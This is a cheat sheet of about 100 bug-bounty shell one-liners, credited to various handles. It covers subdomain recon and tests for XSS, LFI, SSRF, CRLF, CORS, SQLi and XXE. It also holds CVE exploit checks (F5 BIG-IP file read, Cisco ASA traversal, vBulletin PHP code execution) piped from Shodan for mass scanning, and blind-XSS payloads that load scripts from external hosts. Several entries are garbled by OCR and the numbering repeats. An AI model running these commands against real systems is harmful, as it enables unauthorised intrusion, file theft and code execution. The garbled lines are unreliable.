more

1 . find subdomain 

subfinder -d issuu.com -silent | httpx -silent -o issuu.com1.txt
iterable.com

2.Find XSS - Single Target - { One-liner }

gospider -s "https://www.target.com/" -c 19 -d 5 --blacklist ".
(jpgljpeglgif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-
source | grep -e "code-200" | awk '{print $5}'| grep "=" | gsreplace -a |
dalfox pipe -o result.txt


3. Find XSS - Multiple Target - { One-liner 

gospider -S urls.txt -c 10 -d 5-blacklist ". (jpg|jpeg|gif|css|tif tiff|png|ttf|woff|woff2|ico pdf|svg|txt)" --other source | grep -e "code-288" | awk '{print $5)| grep "=" | qsreplace a dalfox pipe -o result.txt

4. Local File Inclusion

gau HOST | gf lfi | qsreplace " /etc/passwd "  | xargs -I% -P 25 sh -c ' curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %" '


5.Local File Inclusion
@dwisiswant0

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

6.Open-redirect
@dwisiswant0

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
@N3T_hunt3r

cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

7.XSS
@cihanmehmet

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
@fanimalikhack

waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
@oliverrickfors

cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

8.Prototype Pollution
@R0X4R

subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

9.CVE-2020-5902
@Madrobot_

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

10.CVE-2020-3452
@vict0ni

while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt

11.CVE-2022-0378
@7h3h4ckv157

cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done

12vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
@Madrobot_

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

13.Find JavaScript Files
@D0cK3rG33k

assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done

14.Extract Endpoints from JavaScript
@renniepak

cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

15.Get CIDR & Org Information from Target Lists
@steve_mcilwain

for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done

16.Get Subdomains from RapidDNS.io
@andirrahmani1

curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

17.Get Subdomains from BufferOver.run
@_ayoubfathi_

curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
@AnubhavSingh_

export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"

18.Get Subdomains from Riddler.io
@pikpikcu

curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

19.Get Subdomains from VirusTotal
@pikpikcu

curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

20.Get Subdomain with cyberxplore
@pikpikcu

curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 

21.Get Subdomains from CertSpotter
@caryhooper

curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

22.Get Subdomains from Archive
@pikpikcu

curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

23.Get Subdomains from JLDC
@pikpikcu

curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

24.Get Subdomains from securitytrails
@pikpikcu

curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u

25.Bruteforcing Subdomain using DNS Over
@pikpikcu

while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt

26.Get Subdomains With sonar.omnisint.io
@pikpikcu

curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

27.Get Subdomains With synapsint.com
@pikpikcu

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

28.Get Subdomains from crt.sh
@vict0ni

curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

29.Sort & Tested Domains from Recon.dev
@stokfedrik

curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent

30.Subdomain Bruteforcer with FFUF
@GochaOqradze

ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'

31.Find Allocated IP Ranges for ASN from IP Address
wains.be

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

32.Extract IPs from a File
@emenalf

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

33.Ports Scan without CloudFlare
@dwisiswant0

subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

34.Create Custom Wordlists
@tomnomnom

gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' FILE1.txt
cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt  

35.Extracts Juicy Informations
@Prial Islam Khan

for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt  ;done

36.Find Subdomains TakeOver
@hahwul

subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 

37.Dump Custom URLs from ParamSpider
@hahwul

cat HOSTS.txt | xargs -I % python3 paramspider.py -l high -o ./OUT/% -d %;

38.URLs Probing with cURL + Parallel
@akita_zen

cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

39.Dump In-scope Assets from chaos-bugbounty-list
@dwisiswant0

curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'

40.Dump In-scope Assets from bounty-targets-data
@dwisiswant0

41.HackerOne Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

42.BugCrowd Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

43.Intigriti Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

44.YesWeHack Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

45.HackenProof Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

46.Federacy Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

47.Dump URLs from sitemap.xml
@healthyoutlet

curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

48.Pure Bash Linkfinder
@ntrzz

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt

49.Extract Endpoints from swagger.json
@zer0pwn

curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'

50.CORS Misconfiguration
@manas_hunter

site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done

51.Find Hidden Servers and/or Admin Panels
@rez0__

ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt 

52.Recon Using api.recon.dev
@z0idsec

curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=HOST | jg .[].domain

53.Find Live Host/Domain/Assets
@YashGoti

subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

54.XSS without gf
@HacktifyS

waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done

55.Get Subdomains from IPs
@laughface809

python3 hosthunter.py HOSTS.txt > OUT.txt

56.Gather Domains from Content-Security-Policy
@geeknik

curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" |  sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u

57.Nmap IP:PORT Parser Piped to HTTPX
@dwisiswant0

nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent


58.Check .git/HEAD - { One-liner }

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-
data/master/data/domains.txt -nv | cat domains.txt | sed
's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -
timeout 3 -retries @ -ports 80,8080,443 -threads 500 -title | anew

59.find .git/HEAD - { One-liner }

curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.
[1.name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx —
55 B =Yoo oo 1o R =Y o b =Y Vol of IR =X o VKT of T [ 123 T2 A o 1 =TTV i IR o0 of o K-E-M - IR oTo T ot £
80,8080,443 -threads 500 -title | anew


51.Find XSS - { One-liner }

#/bin/bash
hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" 3
| egrep -iv ".
(ipglipeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" |
gsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-1*" |

dalfox pipe -b https://your.xss.ht


52.BXSS - Bling XSS in Parameters - { One-liner }

subfinder -d target.com | gau | grep " " | bxss -appendMode -payload '">
<script src=https://hacker.xss.ht></script>"' -parameters


53. Blind XSS In X-Forwarded-For Header 
- { One-liner }

subfinder -d target.com | gau | bxss -payload '"><script
src=https://hacker.xss.ht></script>"' -header “X—For‘war‘ded—For“%

54.XSS using gf with single target - { One-liner }
vecho "http://testphp.vulnweb.com/" | waybackurls | httpx -silent —timeout§
2 -threads 100 | gf xss | anew


55.XSS httpx - { One-liner }

httpx -1 master.txt -silent -no-color -threads 300 -location 301,302 | awki
*{print $2}' | grep -Eo "(http|https)://[~/"]1.* | tr -d '[]1" | anew |
xargs -I@ sh -c 'gospider -d @ -s @' | tr ' ' '\n' | grep -Eo
*(http|https)://[~/"]1.*" | grep "=" | gsreplace "<svg onload=alert(1)>"


56.XSS from javascript hidden params 
- { One-liner }

assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do
vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e
s, var',""$url”2',g" -e s/ //g° | grep -v '.js' | sed ‘'s/.*/&=xss/g');
echo -e "\e[1;33m$url\n\e[1;32m$vars"


57.Extract all URLs from Source Code
 curl "https://example .com/" | grep -oP '(https*://|www\.)[^ ]*' 

58. Find Subdomain from VirusTotal

curl -s "https ://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

59.Get Subdomains from Archive

 curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

 60. Find JavaScript File

assetfinder --subs-only HOST | gau | egrep -v '(.css| .png| .jpeg| .jpg|  .svg|  .gif| .wolf)' | while read url ;do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_l+" | sed -e 's, 'var', '"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo e "\e[1;33m$url\n" "\e[1;32m$vars"; done


===========================================================================================================================================

61. CRLF Injection Check One Liner
On Live Domains
Explanation – Takes input of live domains file and passes it to rush which runs 40 workers (-j40) parallely and displays if the injected value is reflected in response header.

cat live-domains | rush -j40 'if curl -Iks -m 10 "{}/%0D%0Acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "{}/%0d%0acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "{}/%E5%98%8D%E5%98%8Acrlf:crlf" | grep -q "^crlf:crlf"; then echo "The URL {} may be vulnerable to CRLF Injection. Check Manually";fi'

On Live Urls with Parameters
Explanation – Takes input of urls file and passes it to qsreplace which replaces the value of parameters as the injected one and passes it to rush which runs 40 workers (-j40) parallely and displays if the injected value is reflected in response header.

cat urls.txt | qsreplace "%0d%0acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'
Test Case 2

cat urls.txt | qsreplace "%E5%98%8D%E5%98%8Acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'
Test Case 3

cat urls.txt | qsreplace -a "%0d%0acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'
On Headers (Files containing live domains)
Explanation – If any header is vulnerable to crlf injection, then it alerts.

cat $1 | rush -j40 'if curl -Iks -m 10 "{}" -H "CF-Connecting_IP: %0d%0acrlf:crlf" -H "From: root@%0d%0acrlf:crlf" -H "Client-IP: %0d%0acrlf:crlf" -H "X-Client-IP: %0d%0acrlf:crlf" -H "X-Forwarded-For: %0d%0acrlf:crlf" -H "X-Wap-Profile: %0d%0acrlf:crlf" -H "Forwarded: %0d%0acrlf:crlf" -H "True-Client-IP: %0d%0acrlf:crlf" -H "Contact: root@%0d%0acrlf:crlf" -H "X-Originating-IP: %0d%0acrlf:crlf" -H "X-Real-IP: %0d%0acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "From: root@%E5%98%8D%E5%98%8Acrlf:crlf" -H "Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Forwarded-For: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Wap-Profile: %E5%98%8D%E5%98%8Acrlf:crlf" -H "Forwarded: %E5%98%8D%E5%98%8Acrlf:crlf" -H "True-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "Contact: root@%E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Originating-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Real-IP: %E5%98%8D%E5%98%8Acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: %0D%0Acrlf:crlf" -H "From: root@%0D%0Acrlf:crlf" -H "Client-IP: %0D%0Acrlf:crlf" -H "X-Client-IP: %0D%0Acrlf:crlf" -H "X-Forwarded-For: %0D%0Acrlf:crlf" -H "X-Wap-Profile: %0D%0Acrlf:crlf" -H "Forwarded: %0D%0Acrlf:crlf" -H "True-Client-IP: %0D%0Acrlf:crlf" -H "Contact: root@%0D%0Acrlf:crlf" -H "X-Originating-IP: %0D%0Acrlf:crlf" -H "X-Real-IP: %0D%0Acrlf:crlf" | grep -q "^crlf:crlf"; then echo "The URL {} with vulnerable header may be vulnerable to CRLF Injection. Check Manually";fi'

62. SSRF Check One Liner
On Headers (File containing live domains)
Explanation – Injceted burp collaborator server in requested headers and issues a request and saves it in the output file including each request timing so that if one gets a hit, he can confirm by checking the request timing.

Replace $2 with your burp collaborator server.


cat live-domains | rush -j40 'if curl -skL -o /dev/null "{}" -H "CF-Connecting_IP: $2" -H "From: root@$2" -H "Client-IP: $2" -H "X-Client-IP: $2" -H "X-Forwarded-For: $2" -H "X-Wap-Profile: http://$2/wap.xml" -H "Forwarded: $2" -H "True-Client-IP: $2" -H "Contact: root@$2" -H "X-Originating-IP: $2" -H "X-Real-IP: $2"; then echo "{}" | ts; fi' | tee -a ssrf-headers-out.txt
On Urls containing params
Explanation – Takes urls list, replaces the params value to the burp collaborator server and passes it to rush for parallel working.

cat urls.txt | qsreplace "your.burpcollaborator.server" | rush -j40 'if curl -skL "{}" -o /dev/null; then echo "{}" | ts; fi' | tee -a ssrf-output-log.txt
Test Case 2

cat params.txt | qsreplace "http://$1" | rush -j40 'if curl -skL "{}" -o /dev/null; then echo "{}" | ts; fi' | tee -a ssrf-output-log.txt
63. SpringBoot Actuator Check One Liner
On Live Domains
Explanation – Takes live domains list and checks wheather the springboot actuators are publicly accessible or not.

cat live-domains | rush -j40 'if curl -skI -m 10 "{}/env" | grep -i "x-application-context" || curl -sk -m 10 "{}/actuator/env" | grep -q "sping.config.location\|spring.application.name\|JAVA_HOME" || curl -sk -m 10 "{}/env" | grep -q "sping.config.location\|spring.application.name\|JAVA_HOME" || curl -sk -m 10 "{}/actuator" | grep -q '{"_links":{"self"' || curl -sk -m 10 "{}/actuator/configprops" | grep -q "org.springframework.boot.actuate\|beans" || curl -sk -m 10 "{}/configprops" | grep -q "org.springframework.boot.actuate\|beans"; then echo "SpringBoot Actuator Found on {}"; fi' &
On Live urls with params
Explanation – Takes urls list and checks wheather the application is using springboot or not.

cat params.txt | rush -j40 'if curl -skI -m 10 "{}" | grep -i "x-application-context"; then echo "SpringBoot application context header Found on {}"; fi'
64. Drop Blind XSS payload on list of Urls with params
Explanation – Takes urls file as input, replaces the param value with blind xss payload and issues the request with 40 workers running parallely.

cat urls.txt | qsreplace '"><script src="https://script.xss.ht"></script>' | rush -j40 'curl -sk "{}" -o /dev/null'
65. Reflection Check (XSS) on one domain by extracting Hidden params
Explanation – Extracts the hidden parameters from the page and checks wheather it can be vulnerable to xss or not.


curl -skL "https://in.yahoo.com" | grep 'type="hidden"' | grep -Eo 'name="[^\"]+"' | cut -d'"' -f2 | xargs -I@ sh -c 'if curl -skL https://in.yahoo.com/?@=testxss | grep -q "value=testxss"; then echo "reflection found from @ parameter"; fi'
66. Find hidden parameters via Crawl on list of urls
Explanation – Takes urls list and extracts hidden parameters from the list of urls and saves unique params in the file.

cat alive.txt | rush 'curl -skL "{}" | grep "type\=\"hidden\"" | grep -Eo "name\=\"[^\"]+\"" | cut -d"\"" -f2 | sort -u' | anew params.txt
67. Find Secrets in Javascripts files via crawling
Explanation – Takes live domains as input, crawled using hakrawler tool which extracts javascript files  and then passes it to Secretfinder script which checks for sensitive data in the javascript files.

cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder
68. Fetch Domains from Wayback Archive (Input Root-Domains)
Explanation – Takes the input of root-domains file and extracts the domains from the wayback archive.

Root-domains example – gq1.yahoo.com, abc.yahoo.com, root.yahoo.com etc

cat root-dom.txt | rush 'curl -s "http://web.archive.org/cdx/search/cdx?url=*.{}/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sed 's/\.com.*/.com/' | sort -u'
69. Directory Bruteforce using dirsearch and ffuf
Explanation – Direcotry bruteforce using ffuf. Takes input of live domains and scans for direcotries & files.

cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt
using dirsearch
Explanation – Direcotry bruteforce using dirsearch. Takes input of live domains and scans for direcotries & files.

cat alive.txt | xargs -I@ sh -c 'python3 /root/Tools/dirsearch/dirsearch.py -w /path/to/wordlist.txt -u @ -e php,html,json,aspx -t 100' | tee -a dirsearch
70. Crawl list of Domains
Explanation – Crawling list of domains parallely with 30 workers.


cat alive.txt | xargs -P30 -I@ gospider -c 30 -t 15 -a -s @ -d 3 | anew spider

71. Subdomain bruteforce using ffuf
Explanation – Bruteforce subdomains using ffuf tool.

ffuf -u https://FUZZ.domain.com -w /path/to/wordlist -v | grep "| URL |" | awk '{print $4}'

72. Log4J Scan on list of domains
Explanation – Takes live domains as input and scans for log4j vulnerabilities.

cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u "@"
73. Hunt XSS
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
74.. Hunt SQLi
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
75. Hunt SSRF
findomain -t http://target.com -q | httpx -silent -threads 1000 | gau |  grep "=" | qsreplace http://YOUR.burpcollaborator.net
76.. Hunt LFI
gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
77. Hunt Open Redirect
gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
78.. Hunt Prototype Pollution
subfinder -d http://target.com | httpx -silent | sed 's/$/\/?__proto__[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
79.. Hunt CORS
gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
80.. Extract .js
echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder http://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew 
81. Extract URLs from comment
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
82. Dump In-scope Assets from HackerOne
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
83. Find live host/domain/assets
subfinder -d http://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
84. Screenshot
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' 
85. Blind SQL injection testing with time-based payloads
time curl -s 'https://target.com/search.php?q=1 AND sleep(5)--'
86. Directory traversal (path traversal) testing
curl 'https://target.com/page.php?page=../../../../etc/passwd'
87. WordPress version enumeration
curl -s 'https://target.com/readme.html' | grep 'Version'
88. Subdomain takeover testing using subjack
subjack -w subdomains.txt -a -t 100 -v -o takeover.txt -ssl
89. HTTP header injection testing
curl -H 'X-Forwarded-For: 127.0.0.1\r\nUser-Agent: Mozilla/5.0' 'https://target.com/'
90. File upload testing
curl -X POST -F 'file=@test.php' 'https://target.com/upload.php'
91. Cross-site request forgery (CSRF) testing
curl -X POST -d 'name=admin&password=123456&csrf_token=123456' 'https://target.com/login.php'
92. XXE (XML External Entity) injection testing
curl -d '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' 'https://target.com/xxe.php'
93. Get Content-Type
echo abc.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
94. Fuzz with FFUF
assetfinder http://att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'
95. Extract URL from .apk file
apktool -d com.uber -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"
96. Information Disclosure
cat host.txt | httpx -path //server-status?full=true -status-code -content-length
cat host.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length
97. Reflected XSS
subfinder -d abc.com | httprobe -c 100 > target.txt 
cat target.txt | waybackurls | gf xss | kxss
gospider -a -s abc.com -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
98. SSTI to RCE
 waybackurls http://target.com | qsreplace "abc{{9*9}}" > fuzz.txt
 ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
99. Dump In-scope Assets from chaos-bugbounty-list
curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'
100. CORS (Cross-Origin Resource Sharing) testing
